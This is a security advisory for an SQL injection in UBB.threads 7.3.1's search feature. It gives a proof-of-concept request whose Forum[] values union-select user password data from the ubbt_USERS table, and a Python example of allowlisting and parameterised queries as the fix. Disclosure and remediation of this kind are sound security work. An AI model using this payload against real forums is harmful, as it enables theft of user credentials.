UBB.threads 'Forum[]' Array SQL Injection Vulnerability
BID:31074
Info
| Bugtraq ID: | 31074 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-6970 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 02 2008 12:00AM |
| Updated: | Apr 16 2015 05:54PM |
| Credit: | James Bercegay |
| Vulnerable: | Groupee UBB.threads 7.3.1 |
| Not Vulnerable: | |
Discussion
UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects UBB.threads 7.3.1 (released before September 2, 2008) and prior versions.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following example request is available:
ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*
Solution / Fix
Solution:
The vendor has released fixes. Please see the references for more information.
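The class of fix for this bug, shown as an added example that is not Groupee's patch or code from the advisory: each Forum[] element is checked against a strict allowlist and then bound as a query parameter, so no user-supplied text reaches the SQL string. The "f" plus digits format is an assumption inferred from values such as f1 in the request above; the posts table, its columns and the function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: a legitimate Forum[] element is "f" plus a numeric forum id (e.g. "f1").
FORUM_ID = re.compile(r"f(\d{1,9})")

def parse_forum_ids(query_string):
    """Return (ids, rejected): integer forum ids and the raw values that failed validation."""
    values = parse_qs(query_string, keep_blank_values=True).get("Forum[]", [])
    ids, rejected = [], []
    for raw in values:
        m = FORUM_ID.fullmatch(raw)
        if m:
            ids.append(int(m.group(1)))
        else:
            rejected.append(raw)
    return ids, rejected

def search_posts(db, query_string, words):
    """Run the search only if every Forum[] element validates; bind all values as parameters."""
    ids, rejected = parse_forum_ids(query_string)
    if rejected or not ids:
        raise ValueError(f"invalid Forum[] values: {rejected!r}")
    marks = ",".join("?" * len(ids))  # only "?" placeholders are interpolated into the SQL text
    sql = (f"SELECT id, forum_id, body FROM posts "
           f"WHERE forum_id IN ({marks}) AND body LIKE ? ORDER BY id")
    return db.execute(sql, (*ids, f"%{words}%")).fetchall()

def demo_db():
    """Constructed in-memory schema; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, forum_id INTEGER, body TEXT)")
    db.executemany("INSERT INTO posts (forum_id, body) VALUES (?, ?)",
                   [(1, "test post"), (2, "another test"), (3, "unrelated")])
    return db

# Constructed benign request, and one carrying the first Forum[] element from the request above.
BENIGN = "ubb=dosearch&fromsearch=1&Words=test&Forum[]=f1&Forum[]=f2"
TAMPERED = "ubb=dosearch&fromsearch=1&Words=test&Forum[]=f-99')) UNION SELECT '1&Forum[]=f1"

if __name__ == "__main__":
    db = demo_db()
    print(search_posts(db, BENIGN, "test"))
    print(parse_forum_ids(TAMPERED))
```

Rejecting the whole request when any element fails validation, rather than silently dropping the bad element, also gives the application a clean point at which to log the attempt.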
References
References:
- Security Patch released for all 7.x versions (Groupee)
- UBB.threads Homepage (Groupee)
- UBB.threads <= 7.3.1 SQL Injection (GulfTech Research And Development)